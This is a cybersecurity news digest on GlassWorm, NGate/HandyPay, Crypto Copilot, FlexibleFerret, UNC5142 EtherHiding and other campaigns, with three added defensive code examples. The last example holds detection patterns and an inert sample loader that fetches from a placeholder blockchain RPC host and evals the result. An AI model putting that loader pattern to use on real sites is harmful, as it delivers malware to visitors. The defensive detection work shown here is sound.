The GlassWorm attack intensifies with the discovery of 73 new extensions

The supply chain attack known as GlassWorm has recently escalated with the identification of 73 new sleeper extensions in the Open VSX marketplace. This development, which occurred in April 2026, represents a dangerous evolution in the way threat actors distribute malware to software developers. This group of extensions follows a previous wave detected in March 2026, which had already documented 72 malicious extensions associated with the same operation.

The evolution of malicious extensions

The new tactics employed by the attackers aim to evade security scans. Previous variants of this attack abused the dependency feature of extensions to silently install malicious loaders. The sleeper extensions, by contrast, are counterfeit packages published in a dormant, apparently harmless state so that they can build trust and accumulate downloads before being activated.

To carry out their operations, the attackers create fraudulent GitHub accounts and use them to publish cloned versions of popular tools. A clear example is a counterfeit copy of the Turkish Language Pack for Visual Studio Code that closely mimics the legitimate version, copying its icon and description and changing only the publisher name. Once developers install these clones, the attackers wait and then push an update that delivers the malware. At least six of the 73 new extensions have already been activated and now act as loaders that fetch external malware payloads.

Because the malicious code is no longer present in the published source of the extension, detection becomes considerably harder. Security teams should watch for the associated indicators of compromise, and developers should verify the publisher namespace and review the publishing account before installing any extension from the Open VSX marketplace.
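The publisher-namespace check recommended above can be made mechanical. The following is an added example, not code from the article or from Open VSX: it compares a marketplace listing against a team-vetted allow-list and flags entries that reuse a trusted extension's display name under a different namespace, which is exactly the cloning pattern described. All namespaces, extension names and the `verifiedNamespace` field are constructed for the example.

```javascript
// Added example, not part of the article or of Open VSX. A pre-install check
// that compares a marketplace listing against a team-vetted allow-list and
// flags entries whose display name matches a trusted extension while the
// publisher namespace differs. All names and fields below are constructed.

// Constructed allow-list: extensions the team has already vetted.
const TRUSTED_EXTENSIONS = [
  { namespace: "vscode-language-packs", name: "turkish-pack",
    displayName: "Turkish Language Pack for Visual Studio Code" },
  { namespace: "acme-tools", name: "yaml-lint", displayName: "YAML Lint" },
];

// Constructed search results, shaped like marketplace metadata. The
// `verifiedNamespace` flag is an assumed field standing in for whatever
// namespace-ownership signal the marketplace exposes.
const LISTING = [
  { namespace: "vscode-language-packs", name: "turkish-pack",
    displayName: "Turkish Language Pack for Visual Studio Code",
    description: "Turkish UI translations for VS Code.", verifiedNamespace: true },
  { namespace: "lang-packs-official", name: "turkish-pack",
    displayName: "Turkish Language Pack For Visual Studio Code",
    description: "Turkish UI translations for VS Code.", verifiedNamespace: false },
  { namespace: "acme-tools", name: "yaml-lint", displayName: "YAML Lint",
    description: "Lints YAML files.", verifiedNamespace: true },
  { namespace: "someone", name: "rust-helper", displayName: "Rust Helper",
    description: "Helpers for Rust projects.", verifiedNamespace: false },
];

// Clones rely on case, punctuation and whitespace differences to slip past
// an exact-string comparison, so compare a normalized form of the name.
function normalizeName(s) {
  return s.toLowerCase().replace(/[^a-z0-9]+/g, " ").trim();
}

// One finding per listing entry that reuses a trusted display name under a
// different namespace. `trusted` defaults to the allow-list above.
function findLookalikes(listing, trusted = TRUSTED_EXTENSIONS) {
  const byName = new Map(trusted.map((t) => [normalizeName(t.displayName), t]));
  const findings = [];
  for (const ext of listing) {
    const original = byName.get(normalizeName(ext.displayName));
    if (!original) continue;                                   // no trusted name reused
    if (ext.namespace.toLowerCase() === original.namespace.toLowerCase()) continue;
    findings.push({
      id: `${ext.namespace}.${ext.name}`,
      impersonates: `${original.namespace}.${original.name}`,
      // An unverified namespace reusing a trusted name is the strongest signal.
      namespaceVerified: Boolean(ext.verifiedNamespace),
    });
  }
  return findings;
}

// Gate for a single extension: it is installable if it is on the allow-list,
// or if it does not collide with any trusted display name at all.
function isSafeToInstall(ext, trusted = TRUSTED_EXTENSIONS) {
  const onAllowList = trusted.some(
    (t) => t.namespace.toLowerCase() === ext.namespace.toLowerCase() && t.name === ext.name);
  return onAllowList || findLookalikes([ext], trusted).length === 0;
}

console.log(findLookalikes(LISTING));
```

Run against the constructed listing, the check reports only `lang-packs-official.turkish-pack` as impersonating `vscode-language-packs.turkish-pack`; the legitimate pack and the unrelated `rust-helper` pass. In practice the allow-list would be generated from the extensions already approved in the organization's editor configuration.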

Beware! The HandyPay app captures your card information without permission

A new and more dangerous version of the NGate malware hidden in a payment NFC application known as HandyPay has been detected. This malicious software has been active since November 2025 and uses artificial intelligence to write its code, marking a significant shift in the techniques employed by cybercriminals to develop attack tools.


Do not enter your card PIN in unknown applications

The HandyPay application, which is originally legitimate and available on Google Play since 2021, has been trojanized. The attackers have distributed this malicious version outside the official store, using two distinct channels. The first involves a fake lottery website that simulates being the Brazilian lottery organization Rio de Premios, where users are lured with a fraudulent scratch card game. The second channel involves a fake Google Play page aimed at deceiving users into downloading the malware under the name Card Protection.

Once the application is installed, HandyPay asks the user to set it as the default NFC payment app. This seems harmless as it is part of the original functionality of the app. However, when the user enters their card PIN and brings their card close to the phone, the malware captures the card information and sends it to the attacker-controlled device without requiring special permissions, making it difficult to detect.

Researchers from WeLiveSecurity have identified that the malicious code contains signs of having been generated by artificial intelligence. Users are advised to download payment applications only from official sources and to enable Google Play Protect for added security. Above all, the card PIN should never be entered in unknown applications, especially those that claim to offer prizes or card protection.

Cybercriminals are changing tactics: Data exfiltration and extortion on the rise

A recent report from Arctic Wolf highlights a significant shift in the tactics of cyber attackers, who have begun to abandon encryption in favor of data exfiltration and extortion. This shift has emerged as a response to the pursuit of better economic returns, contributing to a new wave of attacks where ransomware is no longer the sole focus. In fact, ransomware accounted for 44% of the response incidents during the analyzed period.

New strategies of criminals

The manufacturing sector has become the most affected, followed by law firms, schools, financial institutions, and health organizations. These sectors account for the majority of attacks, reflecting the growing impact of cyber threats on key industries of the economy. Furthermore, ransomware gangs have adopted affiliate models, allowing for greater interconnection between different groups, making them more competitive and harder to stop.

The report indicates that law enforcement actions have weakened groups like LockBit, ALPHV/BlackCat, and BlackSuit, suggesting that these efforts have had some effect on their operations. However, other types of attacks, such as business email compromise (BEC), have proliferated, representing 26% of the cases investigated by Arctic Wolf. Most of these attacks targeted financial and legal organizations, with email phishing serving as the initial access method in 85% of the cases compared.

In addition, attackers have shown a particular preference for compromising remote access tools, such as Remote Desktop Protocol and remote management software, which account for two-thirds of cases unrelated to BEC, a significant increase compared to previous years. This shift in tactics underscores the adaptability and operational maturity of cybercriminals in a constantly evolving technological landscape.

Bumble and Match are victims of a cyberattack that reveals internal data

The dating apps Bumble and Match have been attacked by the cybercriminal group known as ShinyHunters, responsible for compromising internal data from multiple large companies. According to reports, the group has added both companies to its data leak site, claiming the theft of thousands of documents classified as restricted and confidential, primarily sourced from Google Drive and Slack.

Sometimes dates don’t go well

Bloomberg reports that Bumble, which also operates Badoo and BFF, contacted authorities after one of its contractors' accounts was compromised in a phishing incident. A spokesperson for Bumble stated that the attackers gained unauthorized access to a small portion of its network, but that the company does not believe member data, including accounts, direct messages, or profiles, has been affected.

For its part, Match confirmed that it suffered a cyber incident on January 28, which impacted a limited amount of user data. The company is notifying the affected individuals and assured that there is no evidence that access credentials, financial information, or private communications have been compromised.

ShinyHunters has been in the spotlight recently for its successful attacks on several large companies and for its focus on data exfiltration, having abandoned ransomware deployment altogether. The group has been targeting single sign-on platforms like Okta and Microsoft, and organizations, especially in the United States, have been warned about phishing attempts by individuals impersonating technical support staff.

New phishing tactics exploit trust among senior executives

Recently, a sophisticated phishing attack has put companies on alert, especially those operating in the Middle East. Malicious actors managed to impersonate an ongoing email thread between high-level executives, using a phishing link that mimicked a Microsoft authentication form, demonstrating a clever execution of social engineering.

The ingenious impersonation technique

The attack began with a compromised sales manager account at a contracting company, allowing the insertion of a malicious message into a legitimate conversation. This tactic, which exploits trust and communication within organizations, has proven to be particularly effective, as attackers took advantage of genuine emails between employees to create an appearance of normalcy in their phishing emails.

Researchers have linked the intrusion to a campaign active since December 2025, which has primarily targeted companies in the financial and energy sectors in the region. The investigation revealed the use of EvilProxy, a phishing toolkit that evades traditional detection by placing a proxy layer between the victim and the real service, allowing the attackers to operate undetected.

This type of attack not only takes advantage of technical weaknesses but also exploits human workflows: because the messages arrive from a genuine account inside an existing thread, they look entirely legitimate and are harder for filtering systems such as DMARC to stop. As remote work becomes normalized and asynchronous approval processes become common, companies face an increased risk of compromise.

The importance of having adequate defense measures has grown significantly. Tools like ANY.RUN provide the ability to detect phishing behaviors in real-time, shortening response times to incidents and strengthening corporate cybersecurity.

The rise of AI-generated malware poses new threats to cybersecurity

Security researchers have warned of an alarming increase in the development of malware using artificial intelligence tools, marking a significant transition from the theoretical realm to practical applications in cybercrime. This phenomenon has been documented by the cybersecurity firm Check Point Research, which has analyzed the activities of a well-known state-backed threat actor from North Korea, known as KONNI, which has been active for over a decade.

The evolution of cyber threats

Initially, KONNI’s focus was on politicians, diplomats, and academics, primarily in South Korea. However, in its latest campaign, the group has changed its strategy, targeting software developers, especially those related to blockchain and cryptocurrencies. The attackers have been using highly convincing phishing techniques to access cloud infrastructures, source code repositories, and blockchain credentials.

CPR researchers explain that victims who fell for the lure allowed the installation of an AI-generated PowerShell backdoor, which gave the attackers full access to their computers and the secrets stored on them. The use of AI-generated malware not only accelerates the development of new attacks but also allows threats to be customized faster and more flexibly, evading traditional signature-based detection.

In light of this new reality, cybersecurity professionals will need to adapt their approaches. There is an emphasis on the need to consider development environments as high-value targets and to strengthen prevention against phishing within collaboration and development workflows. Additionally, it is recommended to protect development infrastructures and the cloud with robust access controls and to use AI-driven threat prevention techniques to detect malware that is not visible in the early stages of an attack.

A malicious Chrome extension redirects cryptocurrency exchange platforms

A new finding has revealed a malicious extension in the Chrome Web Store called Crypto Copilot. The extension injects a hidden SOL transfer into swap transactions, redirecting funds to a wallet controlled by the attackers, and raises serious concerns about user security in the cryptocurrency ecosystem.

Be careful if you use cryptocurrencies

The extension, published by a user under the pseudonym ‘sjclark76’, has achieved 12 installations and remains available for download. According to security researchers, Crypto Copilot presents a legitimate facade by offering users the ability to trade crypto directly on X with real-time information and seamless execution. However, behind this interface, there is malicious behavior that is triggered when trading on Raydium, a decentralized exchange based on the Solana blockchain.

The extension's code is obfuscated to avoid detection, and it tampers with the swap by appending an additional SOL transfer instruction each time the user signs a transaction. The added transfer takes 0.05% of the swapped amount, with a floor of 0.0013 SOL, and sends it to a wallet hardcoded in the extension. Users will not notice the hidden transfer unless they review every instruction in the transaction before signing it.
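Reviewing every instruction before signing is the defence the paragraph points to, and it can be automated on the wallet side. The following is an added example, not code from the article or from the Crypto Copilot extension: it walks a decoded Solana transaction, decodes every System Program Transfer, and reports those that debit the user's wallet toward a destination that is not part of the expected swap. It relies only on the public System Program id and its Transfer encoding (a u32 little-endian instruction index of 2 followed by a u64 little-endian lamport amount); the wallet, DEX program and destination addresses and the sample transaction are constructed, and the `reportedSkimLamports` helper simply reproduces the fee formula the article reports.

```javascript
// Added example, not from the article or the Crypto Copilot extension. A
// pre-signing audit that lists every System Program transfer debiting the
// user's wallet and flags the ones whose destination is not expected. Only
// the System Program id and Transfer encoding are real; every address and
// amount below is constructed.

const SYSTEM_PROGRAM_ID = "11111111111111111111111111111111";
const SYSTEM_TRANSFER_INDEX = 2;           // u32 LE discriminator of Transfer
const LAMPORTS_PER_SOL = 1_000_000_000n;

// Build Transfer instruction data: u32 LE index followed by u64 LE lamports.
function encodeTransferData(lamports) {
  const buf = new Uint8Array(12);
  const view = new DataView(buf.buffer);
  view.setUint32(0, SYSTEM_TRANSFER_INDEX, true);
  view.setBigUint64(4, BigInt(lamports), true);
  return buf;
}

// Decode an instruction as a System Program Transfer, or return null.
// Transfer accounts: [0] funding account (signer, writable), [1] recipient.
function decodeSystemTransfer(ix) {
  if (ix.programId !== SYSTEM_PROGRAM_ID || ix.data.length < 12 || ix.keys.length < 2) return null;
  const view = new DataView(ix.data.buffer, ix.data.byteOffset, ix.data.byteLength);
  if (view.getUint32(0, true) !== SYSTEM_TRANSFER_INDEX) return null;
  return { from: ix.keys[0].pubkey, to: ix.keys[1].pubkey, lamports: view.getBigUint64(4, true) };
}

// Every transfer that debits `wallet` to a destination outside
// `allowedDestinations` (the swap program's own fee or vault accounts).
function auditTransaction(tx, wallet, allowedDestinations) {
  const allowed = new Set(allowedDestinations);
  const findings = [];
  tx.instructions.forEach((ix, index) => {
    const t = decodeSystemTransfer(ix);
    if (!t || t.from !== wallet || allowed.has(t.to)) return;
    findings.push({ index, to: t.to, lamports: t.lamports,
                    sol: Number(t.lamports) / Number(LAMPORTS_PER_SOL) });
  });
  return findings;
}

// The article reports the skim as 0.05% of the swapped amount with a floor
// of 0.0013 SOL; reproducing the formula lets an auditor tell whether an
// unexpected transfer matches that pattern.
function reportedSkimLamports(swapLamports) {
  const pct = BigInt(swapLamports) * 5n / 10_000n;   // 0.05%
  const floor = 1_300_000n;                           // 0.0013 SOL
  return pct > floor ? pct : floor;
}

// Constructed transaction: one opaque DEX swap instruction plus a hidden
// System transfer from the wallet to an unrelated address. All placeholders.
const USER_WALLET = "UserWa11et1111111111111111111111111111111111";
const DEX_PROGRAM = "DexProgram1111111111111111111111111111111111";
const DEX_VAULT = "DexVau1t111111111111111111111111111111111111";
const UNKNOWN_DEST = "Unkn0wnDest11111111111111111111111111111111";

const SAMPLE_TX = {
  instructions: [
    { programId: DEX_PROGRAM,
      keys: [{ pubkey: USER_WALLET }, { pubkey: DEX_VAULT }],
      data: new Uint8Array([9, 0, 0, 0]) },                      // opaque swap data
    { programId: SYSTEM_PROGRAM_ID,
      keys: [{ pubkey: USER_WALLET }, { pubkey: UNKNOWN_DEST }],
      data: encodeTransferData(1_300_000n) },                    // the skim
  ],
};

console.log(auditTransaction(SAMPLE_TX, USER_WALLET, [DEX_VAULT]));
```

On the constructed transaction the audit reports a single unexpected transfer of 1,300,000 lamports (0.0013 SOL) at instruction index 1, which equals `reportedSkimLamports` for a 1 SOL swap. A wallet or browser-side hook would run this over the decoded transaction and refuse to sign, or prompt, when the list is non-empty.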

Despite the fact that Crypto Copilot is presented as a useful tool that makes use of legitimate services like DexScreener and Helius RPC, its goal seems to be solely to perpetuate fraud at the expense of unsuspecting users. This type of attack highlights the need for constant vigilance in the use of digital tools in the cryptocurrency space.

A new malware for macOS has been discovered that targets user credentials

Recent investigations have revealed a new malware strain on macOS attributed to the group known as FlexibleFerret. This sophisticated threat uses multi-stage scripts and a backdoor written in Go to infiltrate users' systems, with the specific aim of stealing credentials and maintaining access to their devices.

Threatening the most secure system

The malware implements a layered approach to evade detection, starting with scripts that prepare the ground for the installation of the backdoor. This methodology allows attackers to establish a persistent connection with the compromised system, facilitating the theft of sensitive data, such as usernames and passwords.

FlexibleFerret seems to be especially aimed at macOS users, highlighting the growing concern for the security of this operating system. Traditionally, Apple devices have been considered more secure against malware compared to their Windows counterparts, but this new threat challenges that perception. With the rise of remote work and greater reliance on digital platforms, the risk of suffering an attack like FlexibleFerret is more relevant than ever.

Cybersecurity experts warn that this type of malware underscores the importance of maintaining robust security practices, including the implementation of two-factor authentication and active monitoring of sensitive account activity. Additionally, users are advised to keep their systems updated and use reliable antivirus software to protect against future threats.

It remains to be seen to what extent these attack techniques will expand and whether macOS users will be able to withstand the growing tide of malware designed to compromise their systems and steal personal information. Meanwhile, the cybersecurity community remains alert and is working to counter this and other emerging threats.

The group of cyber threats that uses smart contracts to distribute malware

A group of cyber threats known as UNC5142 has been observed using smart contracts on the blockchain to distribute malware aimed at stealing information, affecting both Windows and macOS systems. Among the types of malware used are Atomic, Lumma, and Vidar. This innovative approach, called EtherHiding, hides the malicious code in the BNB Smart Chain, allowing its activities to blend in with legitimate Web3 transactions.

Thousands of compromised websites

According to reports from the Google Threat Intelligence Group, around 14,000 compromised web pages have been flagged for containing malicious JavaScript, illustrating the group's indiscriminate targeting of vulnerable WordPress sites. UNC5142 uses the compromised websites to inject this code, so that malware distribution proceeds through a multi-stage process. A key component is the JavaScript downloader called CLEARSHORT, which delivers the malware through the infected sites.

Since November 2024, UNC5142 has evolved from a single contract system to a more complex strategy involving three smart contracts, thereby improving the operational agility of its campaigns. This architecture resembles a software design principle known as the proxy pattern, allowing for quick updates in critical parts of the attack without the need to modify the JavaScript on the compromised sites.
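The page-side half of this scheme is an inline script on a compromised site that reads its next stage from a smart contract over JSON-RPC and executes what it decoded. The following is an added example, not code from the article or from Google's report: a heuristic scanner that pulls inline scripts out of a page and scores them on that read-then-execute shape (blockchain read methods, hex-to-text decoding, dynamic code execution, contract-style addresses). The indicator list, weights, threshold and the sample page are all constructed; a hit is a triage lead for a WordPress operator, not proof of compromise.

```javascript
// Added example, not from the article or Google's report. A heuristic
// scanner for inline scripts that fetch code from a smart contract over
// JSON-RPC and then execute it. Indicators, weights and the sample page are
// constructed; treat results as triage leads.

// Each indicator: a regex over script text, a weight, and a label.
const INDICATORS = [
  { label: "json-rpc read method", weight: 3, re: /\beth_(call|getStorageAt|getCode)\b/ },
  { label: "hex-to-text decoding", weight: 2, re: /fromCharCode|atob\(|parseInt\([^)]*,\s*16\)/ },
  { label: "dynamic code execution", weight: 3, re: /\beval\(|new\s+Function\(|createElement\(\s*['"]script['"]\s*\)/ },
  { label: "contract-style address", weight: 1, re: /0x[0-9a-fA-F]{40}\b/ },
];
const FLAG_THRESHOLD = 6;   // constructed: RPC read plus execution, or plus decoding

// Bodies of inline <script> elements; external `src` scripts have no inline
// body and are skipped (they would be fetched and scanned separately).
function extractInlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) bodies.push(m[1]);
  }
  return bodies;
}

// Sum the weights of every indicator that matches the script text.
function scoreScript(source) {
  const matched = INDICATORS.filter((ind) => ind.re.test(source));
  return {
    score: matched.reduce((sum, ind) => sum + ind.weight, 0),
    indicators: matched.map((ind) => ind.label),
  };
}

// Inline scripts whose score reaches the threshold, with their position.
function scanPage(html, threshold = FLAG_THRESHOLD) {
  return extractInlineScripts(html)
    .map((src, index) => ({ index, ...scoreScript(src) }))
    .filter((r) => r.score >= threshold);
}

// Constructed page: a benign analytics snippet, an external script, and an
// inert snippet with the RPC-read-then-execute shape (placeholder endpoint,
// zero address, undefined helper; it does nothing if run).
const SAMPLE_HTML = `
<html><head>
<script>window.dataLayer = window.dataLayer || []; dataLayer.push({event: "pageview"});</script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body>
<script>
fetch("https://rpc.example.invalid", {method: "POST", body: JSON.stringify({
  jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{to: "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"]})})
  .then(r => r.json())
  .then(j => eval(String.fromCharCode(...bytesOf(j.result))));
</script>
</body></html>`;

console.log(scanPage(SAMPLE_HTML));
```

On the constructed page the analytics snippet scores 0 and the second inline script scores 9 (all four indicators), so only it is flagged. Because the proxy-pattern contracts let the operators change the payload URL without touching the injected JavaScript, scanning for the loader's shape on the site is more durable than blocking any one download address.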

These smart contracts allow UNC5142 to change the URL from which the payload is fetched. Furthermore, the analysis revealed two distinct smart-contract infrastructures supporting the malware distribution, demonstrating the group's ability to adapt and keep its operations resilient.

These sophisticated methods not only increase the risk for Internet users, but also make it difficult to detect and eliminate their malicious activities. Although Google has not detected activity from UNC5142 since July 2025, this could indicate a pause in their actions or a change in their operational strategy.